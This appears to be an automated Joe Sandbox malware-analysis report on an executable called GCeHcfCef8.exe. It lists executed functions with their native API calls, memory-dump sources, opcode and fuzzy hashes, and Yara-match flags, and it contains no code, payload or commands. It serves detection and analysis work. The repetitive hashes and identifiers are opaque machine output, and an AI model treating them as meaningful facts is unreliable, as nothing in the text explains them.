Memory Dump Source

Source File: 00000000.00000002.1348660645.000000000BF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bf30000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dc91add78b190dff8fde5f3733668198a589b77de8715b53768a184756eb97a
Instruction ID: 8bc7b13de4325c1d892d2f7801f098f3f059f95073d4c9dc685eeeb36d04a8cf
Opcode Fuzzy Hash: 5dc91add78b190dff8fde5f3733668198a589b77de8715b53768a184756eb97a
Instruction Fuzzy Hash: 56112C71E116198BDB48CFAAD9406DEFBF7EBC8310F14C07AD408A7214EB305A418B50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: GCeHcfCef8.exePID: 7052, Parent PID: 6280COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	2.7%
Signature Coverage:	5.7%
Total number of Nodes:	557
Total number of Limit Nodes:	73

Executed Functions

Function 0041A40A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455

Strings

rMA, xrefs: 0041A432, 0041A440
rMA, xrefs: 0041A44D, 0041A454
1JA, xrefs: 0041A42C, 0041A438

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: c7503813edf94be5ba2c54e22c21c5466bd20650403fe145047da1cd5fbab9bb
Instruction ID: fc01f0a9a7a463296cdf2ddec04be91dd5259237522f72ac8338e5fe6fb0ed92
Opcode Fuzzy Hash: c7503813edf94be5ba2c54e22c21c5466bd20650403fe145047da1cd5fbab9bb
Instruction Fuzzy Hash: F0F0E7B2200108ABCB08DF89CC80DEB77A9EF8C714F15824DBA0D97250C630E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455

Strings

rMA, xrefs: 0041A432, 0041A440
rMA, xrefs: 0041A44D, 0041A454
1JA, xrefs: 0041A42C, 0041A438

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: 1JA$rMA$rMA
API String ID: 2738559852-782607585
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A53A Relevance: 1.5, APIs: 1, Instructions: 31
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 07c2f2a55d289a23ca3af0e7479e1b599d270403919e1d51021987e9256cce8c
Instruction ID: f8e3cdc54e06309fc8146fb881595e2c36c995c32cb6fa008751c380793c3acf
Opcode Fuzzy Hash: 07c2f2a55d289a23ca3af0e7479e1b599d270403919e1d51021987e9256cce8c
Instruction Fuzzy Hash: 5BF0F8B6210208AFDB14DF89CC81EEB77A9AF8C654F158149FA4997242C634F911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A48A Relevance: 1.5, APIs: 1, Instructions: 26
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: e2be188ce8e28698715a585d23a03873186ee3c95f2e991be30aa04d5b9dba93
Instruction ID: 27b2774977dc75779a16d9e6a36301c1ab18ded06c0ae9908cf23c73c8696345
Opcode Fuzzy Hash: e2be188ce8e28698715a585d23a03873186ee3c95f2e991be30aa04d5b9dba93
Instruction Fuzzy Hash: B8E0D8726001187ED614EBE8DC45EEBB76CEF80754F15405BF50C5B142C531B1208BE4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01722B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01722B6A

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 27ed98bc164759fc79cf5c69d89e31a5986eb4a68e10331bfaafc6e188f19042
Instruction ID: 90475fe564f00fcaf59f92ca76ad8764ecbad08d013a904f25e07b2649e04a79
Opcode Fuzzy Hash: 27ed98bc164759fc79cf5c69d89e31a5986eb4a68e10331bfaafc6e188f19042
Instruction Fuzzy Hash: 3890026120640003420571584414616801A97E0201B55C131F14185A0EC5358A927226

Uniqueness

Uniqueness Score: -1.00%

Function 01722BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01722BFA

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 94023c3d9fbaab9193cd15ca5292440c3e15c312b06672bc5ea742d9701a6661
Instruction ID: 854c6406b916558cabc38ba6537350b92266ea81803af4c06e23bfe67cace625
Opcode Fuzzy Hash: 94023c3d9fbaab9193cd15ca5292440c3e15c312b06672bc5ea742d9701a6661
Instruction Fuzzy Hash: 6B90023120540802D2807158440464A401597D1301F95C125B0429664ECA258B5A77A2

Uniqueness

Uniqueness Score: -1.00%

Function 01722AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01722ADA

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 11e032369647a2463192265004c49a65392a922c1a82c61e8facb5cca6a196a8
Instruction ID: 491a2bcdcdf7f3233392113e96753e797eb294d3fcde8b91f791260762d260eb
Opcode Fuzzy Hash: 11e032369647a2463192265004c49a65392a922c1a82c61e8facb5cca6a196a8
Instruction Fuzzy Hash: A4900225215400030205B5580704507405697D5351355C131F1419560DD6318A626222

Uniqueness

Uniqueness Score: -1.00%

Function 01722D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01722D3A

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bddb92d60b5244ec4e938fdf4841c908383d730655893e7edacaf036ab500cf
Instruction ID: d747c61ed36f1554940cfb725d204e5a3809c2c48ec9e6f66cffad3039e79adc
Opcode Fuzzy Hash: 4bddb92d60b5244ec4e938fdf4841c908383d730655893e7edacaf036ab500cf
Instruction Fuzzy Hash: A290022130540003D240715854186068015E7E1301F55D121F0818564DD9258A576323

Uniqueness

Uniqueness Score: -1.00%

Function 01722D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01722D1A

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ae7ec1bd803e75812dd768f543de49e768236b8ff92da3e862aed4f5fc1ac34a
Instruction ID: 5eb9d516a2591f4dbdc217ffae48721c1615a548d5a4100f77d9271d44de54b3
Opcode Fuzzy Hash: ae7ec1bd803e75812dd768f543de49e768236b8ff92da3e862aed4f5fc1ac34a
Instruction Fuzzy Hash: B590022921740002D2807158540860A401597D1202F95D525B0419568DC9258A6A6322

Uniqueness

Uniqueness Score: -1.00%

Function 01722DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01722DFA

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5fdd92b6ac3b12b7363d292ff78865ed02a078d06a083519526702b4d0f2b16b
Instruction ID: 5217232a2cb55ea064aeab4054190a2d7df2207e23545a224a08ec922dc99159
Opcode Fuzzy Hash: 5fdd92b6ac3b12b7363d292ff78865ed02a078d06a083519526702b4d0f2b16b
Instruction Fuzzy Hash: 7C90023120540413D21171584504707401997D0241F95C522B0828568ED6668B53B222

Uniqueness

Uniqueness Score: -1.00%

Function 01722DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01722DDA

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e39806490d16e3e9e8b2f48ff3c0065e2b6f1b45501cdaf75c96b302aa4e8b3e
Instruction ID: 7de905ac48fd691b290e5cf66660229fe76c3949a1420a53ac2ea4649d5e9bc0
Opcode Fuzzy Hash: e39806490d16e3e9e8b2f48ff3c0065e2b6f1b45501cdaf75c96b302aa4e8b3e
Instruction Fuzzy Hash: 18900221246441525645B15844045078016A7E0241795C122B1818960DC5369A57E722

Uniqueness

Uniqueness Score: -1.00%

Function 01722C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01722C7A

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 50526eed5ebc5ade91b4eac608054e2f6ffb4d0d24918ef139bb51e6db1be778
Instruction ID: 68018c3ede8c79e6a5806f81a4c700c7735b4c58088b2d82032c7ec425bd4b00
Opcode Fuzzy Hash: 50526eed5ebc5ade91b4eac608054e2f6ffb4d0d24918ef139bb51e6db1be778
Instruction Fuzzy Hash: 9790023120548802D2107158840474A401597D0301F59C521B4828668EC6A58A927222

Uniqueness

Uniqueness Score: -1.00%

Function 01722CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01722CAA

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d5f3799a8080fdc3b7c900403d13ad107bb10240c682e98e5306d03ab7c61c28
Instruction ID: 1c587284ec189280c96270e73f4e8399cffba7cfc8c278470092161d83855c08
Opcode Fuzzy Hash: d5f3799a8080fdc3b7c900403d13ad107bb10240c682e98e5306d03ab7c61c28
Instruction Fuzzy Hash: 9D90023120540402D20075985408646401597E0301F55D121B5428565FC6758A927232

Uniqueness

Uniqueness Score: -1.00%

Function 01722F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01722F3A

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3a9086641e5c554bd9f84fdd2bb269573d7529ca0a4916d236430102c242f2fd
Instruction ID: d2d688d242822a6466c9b327ab4ddb7411b5999d4d87dbbd69e1d3f825feb12e
Opcode Fuzzy Hash: 3a9086641e5c554bd9f84fdd2bb269573d7529ca0a4916d236430102c242f2fd
Instruction Fuzzy Hash: DC90026134540442D20071584414B064015D7E1301F55C125F1468564EC629CE537227

Uniqueness

Uniqueness Score: -1.00%

Function 01722FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01722FEA

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e4365154f3b1f58df165db626324f26aa6b46cb12a050785d8c230a4fb0b5b81
Instruction ID: a119c0068eee0cf8dbb9009ff54be28dc1f3bfbc434bf562226ffa6fca9ecd0f
Opcode Fuzzy Hash: e4365154f3b1f58df165db626324f26aa6b46cb12a050785d8c230a4fb0b5b81
Instruction Fuzzy Hash: 68900221215C0042D30075684C14B07401597D0303F55C225B0558564DC9258A626622

Uniqueness

Uniqueness Score: -1.00%

Function 01722FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01722FBA

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 28aa0d4a7fb3fa4bb70f6dd326d334075190ea4470dbd5e4490af073061728a6
Instruction ID: ff03a1181cf52a54fe0fc58fd96af780433a023435e087e0119daf2109d1667f
Opcode Fuzzy Hash: 28aa0d4a7fb3fa4bb70f6dd326d334075190ea4470dbd5e4490af073061728a6
Instruction Fuzzy Hash: 33900221605400424240716888449068015BBE1211755C231B0D9C560EC5698A666766

Uniqueness

Uniqueness Score: -1.00%

Function 01722F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01722F9A

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aafcbabac01e9165085b7fd044c98985bc58bcaab1ffd64ccd3ceb03d44d1ae2
Instruction ID: a32bcc248978c05a5a56becf2cc139d719ad0aa787b44fbe3de77c9b4fbe236a
Opcode Fuzzy Hash: aafcbabac01e9165085b7fd044c98985bc58bcaab1ffd64ccd3ceb03d44d1ae2
Instruction Fuzzy Hash: 8490023120580402D2007158481470B401597D0302F55C121B1568565EC6358A527672

Uniqueness

Uniqueness Score: -1.00%

Function 01722EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01722EAA

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 927a3e3ef97250dbb99d03954323af98c63e6564dda6606b48494f60475eb9d2
Instruction ID: b7ef6d028ca3d6bab1a358f1cd79bd3a5b95ba76430d72c8561c346a1d45c46f
Opcode Fuzzy Hash: 927a3e3ef97250dbb99d03954323af98c63e6564dda6606b48494f60475eb9d2
Instruction Fuzzy Hash: 7490027120540402D24071584404746401597D0301F55C121B5468564FC6698FD67766

Uniqueness

Uniqueness Score: -1.00%

Function 01722E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01722E8A

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0f646906cc84f6c915ba04c7f25fd23dc3dc942d5c2396de8e03c5ecc1482afc
Instruction ID: f6fc35065fa69368d9e85e3f1d9598cb7704793820a2210f1d1860373cc14d7e
Opcode Fuzzy Hash: 0f646906cc84f6c915ba04c7f25fd23dc3dc942d5c2396de8e03c5ecc1482afc
Instruction Fuzzy Hash: 5E90022160540502D20171584404616401A97D0241F95C132B1428565FCA358B93B232

Uniqueness

Uniqueness Score: -1.00%

Function 00409AB0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D

Strings

6EA, xrefs: 0041A652, 0041A65C

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: 6EA
API String ID: 1279760036-1400015478
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00408395 Relevance: 1.7, APIs: 1, Instructions: 168
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: d856360fe441cf2af3cf985e7ae352a45966348f131babf4a369b4a02c563762
Instruction ID: 513b1df9b156dd44eedd2723c508216830ef1d1bf6efc3dd4786fb69eb0b4070
Opcode Fuzzy Hash: d856360fe441cf2af3cf985e7ae352a45966348f131babf4a369b4a02c563762
Instruction Fuzzy Hash: 4F51B2B09003099FDB14DF65D985BEB77B8EB48308F10056EF849A7281EB74A945CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6A4 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 05afc72a1628d1b8c21c3b037915aba903a84f96ac82d1f5ebd166075e2a44a7
Instruction ID: 1f7c6c8582c1dd18883519b10ea502a97e596646afae4287d8848a544c9bbc47
Opcode Fuzzy Hash: 05afc72a1628d1b8c21c3b037915aba903a84f96ac82d1f5ebd166075e2a44a7
Instruction Fuzzy Hash: 9E112BB2201208BFDB14CF99CC84EEB77ADEF8D754F158258BA0D97241C630E951CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00408309 Relevance: 1.6, APIs: 1, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 64066ee14b45ed18fffa828f6523f35c371a9be450f102fc891f591cb5fe6f06
Instruction ID: ed9df0ad3365d2002663fa5c40fef5dff36fce5f5ec99479e5a609c370036d9e
Opcode Fuzzy Hash: 64066ee14b45ed18fffa828f6523f35c371a9be450f102fc891f591cb5fe6f06
Instruction Fuzzy Hash: 6901B531A8032877E721AA959D43FEF776C5B40F54F04012DFF04BA1C2EAA8690642EA

Uniqueness

Uniqueness Score: -1.00%

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity
